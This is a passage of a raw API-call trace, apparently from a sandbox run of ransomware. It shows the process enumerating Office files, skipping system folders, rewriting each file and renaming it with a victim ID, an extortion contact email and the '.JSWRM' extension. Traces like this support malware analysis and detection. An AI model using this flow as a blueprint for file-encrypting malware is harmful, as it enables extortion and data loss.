[0120.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.620] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=26617) returned 1 [0120.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67f0) returned 0x24e1d8 [0120.620] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x67f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x67f0, lpOverlapped=0x0) returned 1 [0120.623] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.623] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x67f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x67f0, lpOverlapped=0x0) returned 1 [0120.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.623] CloseHandle (hObject=0x314) returned 1 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0120.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.623] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.625] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba1, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR48F.GIF", cAlternateFileName="")) returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2=".") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="..") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="...") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="windows") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="recovery") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="perflogs") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="documents and settings") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="system volume information") returned 1 [0120.625] lstrcmpiW (lpString1="ZPDIR48F.GIF", lpString2="msocache") returned 1 [0120.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR48F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR48F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.647] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7073) returned 1 [0120.647] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ba0) returned 0x24e1d8 [0120.647] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1ba0, lpOverlapped=0x0) returned 1 [0120.649] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.649] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1ba0, lpOverlapped=0x0) returned 1 [0120.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.649] CloseHandle (hObject=0x314) returned 1 [0120.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0120.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0120.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0120.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR48F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir48f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0120.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.651] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR49B.GIF", cAlternateFileName="")) returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2=".") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="..") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="...") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="windows") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="recovery") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="perflogs") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="documents and settings") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="system volume information") returned 1 [0120.651] lstrcmpiW (lpString1="ZPDIR49B.GIF", lpString2="msocache") returned 1 [0120.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0120.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR49B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0120.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0120.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR49B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0120.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7383) returned 1 [0120.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cd0) returned 0x24e1d8 [0120.654] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1cd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1cd0, lpOverlapped=0x0) returned 1 [0120.656] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.656] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1cd0, lpOverlapped=0x0) returned 1 [0120.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.656] CloseHandle (hObject=0x314) returned 1 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0120.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0120.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0120.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.658] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b99, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR49F.GIF", cAlternateFileName="")) returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2=".") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="..") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="...") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="windows") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="recovery") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="perflogs") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="documents and settings") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="system volume information") returned 1 [0120.658] lstrcmpiW (lpString1="ZPDIR49F.GIF", lpString2="msocache") returned 1 [0120.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR49F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0120.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR49F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR49F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0120.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir49f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.659] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7065) returned 1 [0120.659] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.659] RtlAllocateHeap 